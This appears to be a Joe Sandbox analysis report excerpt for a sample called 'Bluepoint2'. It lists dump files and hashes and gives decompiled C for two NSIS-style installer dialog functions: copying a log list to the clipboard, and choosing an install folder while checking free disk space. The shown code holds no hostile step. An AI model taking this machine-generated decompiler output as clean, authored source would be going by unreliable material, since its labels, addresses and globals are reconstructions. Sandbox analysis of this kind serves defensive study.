                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                    • Opcode ID: 9b3a4a81e63f5280f7b70feead95d08d8f3a9406d7ea6593f30183b48ba1c331
                                                                                                                                    • Instruction ID: ae7b3f36cb70fc77e789da716a157ffc7472c1f56122fdea31694fe2877da5ae
                                                                                                                                    • Opcode Fuzzy Hash: 9b3a4a81e63f5280f7b70feead95d08d8f3a9406d7ea6593f30183b48ba1c331
                                                                                                                                    • Instruction Fuzzy Hash: C9B01272B48010DFFE008F65CC06F34326CE700301F144000FA00C01C0C52078008734
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                                                                                    0x00405811
                                                                                                                                    0x00405817
                                                                                                                                    0x00405821
                                                                                                                                    0x00405824
                                                                                                                                    0x004059ba
                                                                                                                                    0x004059de
                                                                                                                                    0x004059de
                                                                                                                                    0x004059f1
                                                                                                                                    0x00405a0f
                                                                                                                                    0x00405a11
                                                                                                                                    0x00405a19
                                                                                                                                    0x00405a6f
                                                                                                                                    0x00405a73
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a75
                                                                                                                                    0x00405a7b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a85
                                                                                                                                    0x00405a8d
                                                                                                                                    0x00405a90
                                                                                                                                    0x00405b92
                                                                                                                                    0x00000000
                                                                                                                                    0x00405b92
                                                                                                                                    0x00405a9f
                                                                                                                                    0x00405aaa
                                                                                                                                    0x00405ab3
                                                                                                                                    0x00405abe
                                                                                                                                    0x00405ac1
                                                                                                                                    0x00405aca
                                                                                                                                    0x00405ad0
                                                                                                                                    0x00405ad3
                                                                                                                                    0x00405ad3
                                                                                                                                    0x00405aeb
                                                                                                                                    0x00405af4
                                                                                                                                    0x00405af7
                                                                                                                                    0x00405afe
                                                                                                                                    0x00405b05
                                                                                                                                    0x00405b0d
                                                                                                                                    0x00405b0d
                                                                                                                                    0x00405b24
                                                                                                                                    0x00405b24
                                                                                                                                    0x00405b2b
                                                                                                                                    0x00405b31
                                                                                                                                    0x00405b3d
                                                                                                                                    0x00405b44
                                                                                                                                    0x00405b4d
                                                                                                                                    0x00405b4f
                                                                                                                                    0x00405b52
                                                                                                                                    0x00405b61
                                                                                                                                    0x00405b64
                                                                                                                                    0x00405b6a
                                                                                                                                    0x00405b6b
                                                                                                                                    0x00405b71
                                                                                                                                    0x00405b72
                                                                                                                                    0x00405b73
                                                                                                                                    0x00405b7b
                                                                                                                                    0x00405b86
                                                                                                                                    0x00405b8c
                                                                                                                                    0x00405b8c
                                                                                                                                    0x00000000
                                                                                                                                    0x00405aeb
                                                                                                                                    0x00405a21
                                                                                                                                    0x00405a51
                                                                                                                                    0x00405a59
                                                                                                                                    0x00405a64
                                                                                                                                    0x00405a64
                                                                                                                                    0x00405a6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a6a
                                                                                                                                    0x00405a25
                                                                                                                                    0x00405a2f
                                                                                                                                    0x00000000
                                                                                                                                    0x004059f3
                                                                                                                                    0x004059f9
                                                                                                                                    0x00405a34
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a3d
                                                                                                                                    0x00405a02
                                                                                                                                    0x00405a07
                                                                                                                                    0x00405a0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a0a
                                                                                                                                    0x004059f1
                                                                                                                                    0x0040582a
                                                                                                                                    0x0040582e
                                                                                                                                    0x00405836
                                                                                                                                    0x0040583a
                                                                                                                                    0x0040583d
                                                                                                                                    0x00405840
                                                                                                                                    0x00405843
                                                                                                                                    0x00405846
                                                                                                                                    0x00405847
                                                                                                                                    0x00405848
                                                                                                                                    0x00405861
                                                                                                                                    0x00405864
                                                                                                                                    0x0040586e
                                                                                                                                    0x0040587d
                                                                                                                                    0x00405885
                                                                                                                                    0x0040588d
                                                                                                                                    0x00405892
                                                                                                                                    0x00405895
                                                                                                                                    0x004058a1
                                                                                                                                    0x004058aa
                                                                                                                                    0x004058b3
                                                                                                                                    0x004058d5
                                                                                                                                    0x004058db
                                                                                                                                    0x004058ec
                                                                                                                                    0x004058f1
                                                                                                                                    0x004058ff
                                                                                                                                    0x0040590d
                                                                                                                                    0x0040590d
                                                                                                                                    0x00405912
                                                                                                                                    0x00405920
                                                                                                                                    0x00405920
                                                                                                                                    0x00405925
                                                                                                                                    0x00405928
                                                                                                                                    0x0040592d
                                                                                                                                    0x00405939
                                                                                                                                    0x00405942
                                                                                                                                    0x0040594f
                                                                                                                                    0x0040595e
                                                                                                                                    0x00405951
                                                                                                                                    0x00405956
                                                                                                                                    0x00405956
                                                                                                                                    0x0040596a
                                                                                                                                    0x0040596a
                                                                                                                                    0x0040597e
                                                                                                                                    0x00405987
                                                                                                                                    0x00405990
                                                                                                                                    0x004059a0
                                                                                                                                    0x004059ac
                                                                                                                                    0x004059ac
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405A96
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                                                                    • EmptyClipboard.USER32 ref: 00405B31
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                                                                    • CloseClipboard.USER32 ref: 00405B8C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: H7B${
                                                                                                                                    • API String ID: 590372296-2256286769
                                                                                                                                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                                                                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                                                                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                                                                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                                                                    0x00404ab5
                                                                                                                                    0x00404abb
                                                                                                                                    0x00404ac1
                                                                                                                                    0x00404ace
                                                                                                                                    0x00404adc
                                                                                                                                    0x00404adf
                                                                                                                                    0x00404ae7
                                                                                                                                    0x00404aed
                                                                                                                                    0x00404aed
                                                                                                                                    0x00404af9
                                                                                                                                    0x00404afc
                                                                                                                                    0x00404b6a
                                                                                                                                    0x00404b71
                                                                                                                                    0x00404c48
                                                                                                                                    0x00404c4f
                                                                                                                                    0x00404c5e
                                                                                                                                    0x00404c5e
                                                                                                                                    0x00404c62
                                                                                                                                    0x00404c6c
                                                                                                                                    0x00404c79
                                                                                                                                    0x00404c7b
                                                                                                                                    0x00404c7b
                                                                                                                                    0x00404c89
                                                                                                                                    0x00404c90
                                                                                                                                    0x00404c97
                                                                                                                                    0x00404c9a
                                                                                                                                    0x00404cd6
                                                                                                                                    0x00404cd8
                                                                                                                                    0x00404cde
                                                                                                                                    0x00404ce3
                                                                                                                                    0x00404ce7
                                                                                                                                    0x00404ce9
                                                                                                                                    0x00404ce9
                                                                                                                                    0x00404d05
                                                                                                                                    0x00000000
                                                                                                                                    0x00404d07
                                                                                                                                    0x00404d0a
                                                                                                                                    0x00404d18
                                                                                                                                    0x00404d1e
                                                                                                                                    0x00404d1f
                                                                                                                                    0x00404d22
                                                                                                                                    0x00404d25
                                                                                                                                    0x00000000
                                                                                                                                    0x00404d25
                                                                                                                                    0x00404c9c
                                                                                                                                    0x00404c9e
                                                                                                                                    0x00404ca2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ca4
                                                                                                                                    0x00404ca4
                                                                                                                                    0x00404cb1
                                                                                                                                    0x00404cb6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404cba
                                                                                                                                    0x00404cbc
                                                                                                                                    0x00404cbc
                                                                                                                                    0x00404cc5
                                                                                                                                    0x00404cc7
                                                                                                                                    0x00404ccc
                                                                                                                                    0x00404ccf
                                                                                                                                    0x00404cd4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404cd4
                                                                                                                                    0x00404d31
                                                                                                                                    0x00404d3b
                                                                                                                                    0x00404d3e
                                                                                                                                    0x00404d41
                                                                                                                                    0x00404d48
                                                                                                                                    0x00404d48
                                                                                                                                    0x00404d4a
                                                                                                                                    0x00404d4a
                                                                                                                                    0x00404d4f
                                                                                                                                    0x00404d51
                                                                                                                                    0x00404d59
                                                                                                                                    0x00404d60
                                                                                                                                    0x00404d62
                                                                                                                                    0x00404d6d
                                                                                                                                    0x00404d6d
                                                                                                                                    0x00404d62
                                                                                                                                    0x00404d7d
                                                                                                                                    0x00404d87
                                                                                                                                    0x00404d8f
                                                                                                                                    0x00404daa
                                                                                                                                    0x00404d91
                                                                                                                                    0x00404d9a
                                                                                                                                    0x00404d9a
                                                                                                                                    0x00404d8f
                                                                                                                                    0x00404daf
                                                                                                                                    0x00404db4
                                                                                                                                    0x00404db9
                                                                                                                                    0x00404dc2
                                                                                                                                    0x00404dc2
                                                                                                                                    0x00404dcb
                                                                                                                                    0x00404dcd
                                                                                                                                    0x00404dcd
                                                                                                                                    0x00404dd9
                                                                                                                                    0x00404de1
                                                                                                                                    0x00404deb
                                                                                                                                    0x00404deb
                                                                                                                                    0x00404df0
                                                                                                                                    0x00000000
                                                                                                                                    0x00404df0
                                                                                                                                    0x00404c9a
                                                                                                                                    0x00404c51
                                                                                                                                    0x00404c58
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404c58
                                                                                                                                    0x00404b77
                                                                                                                                    0x00404b80
                                                                                                                                    0x00404b9a
                                                                                                                                    0x00404b9f
                                                                                                                                    0x00404ba9
                                                                                                                                    0x00404bb0
                                                                                                                                    0x00404bbc
                                                                                                                                    0x00404bbf
                                                                                                                                    0x00404bc2
                                                                                                                                    0x00404bc9
                                                                                                                                    0x00404bd1
                                                                                                                                    0x00404bd4
                                                                                                                                    0x00404bd8
                                                                                                                                    0x00404bdf
                                                                                                                                    0x00404be7
                                                                                                                                    0x00404c41
                                                                                                                                    0x00404be9
                                                                                                                                    0x00404bea
                                                                                                                                    0x00404bf1
                                                                                                                                    0x00404bfb
                                                                                                                                    0x00404c03
                                                                                                                                    0x00404c10
                                                                                                                                    0x00404c24
                                                                                                                                    0x00404c28
                                                                                                                                    0x00404c28
                                                                                                                                    0x00404c24
                                                                                                                                    0x00404c2d
                                                                                                                                    0x00404c3a
                                                                                                                                    0x00404c3a
                                                                                                                                    0x00404be7
                                                                                                                                    0x00000000
                                                                                                                                    0x00404b9f
                                                                                                                                    0x00404b8d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404b93
                                                                                                                                    0x00000000
                                                                                                                                    0x00404afe
                                                                                                                                    0x00404b0b
                                                                                                                                    0x00404b14
                                                                                                                                    0x00404b21
                                                                                                                                    0x00404b21
                                                                                                                                    0x00404b28
                                                                                                                                    0x00404b2e
                                                                                                                                    0x00404b37
                                                                                                                                    0x00404b3a
                                                                                                                                    0x00404b3d
                                                                                                                                    0x00404b45
                                                                                                                                    0x00404b48
                                                                                                                                    0x00404b4b
                                                                                                                                    0x00404b51
                                                                                                                                    0x00404b58
                                                                                                                                    0x00404b5f
                                                                                                                                    0x00404df6
                                                                                                                                    0x00404e08
                                                                                                                                    0x00404b65
                                                                                                                                    0x00404b68
                                                                                                                                    0x00000000
                                                                                                                                    0x00404b68
                                                                                                                                    0x00404b5f

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                                                                    • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                                                                                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77133420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,77133420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,77133420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                                                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                                                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
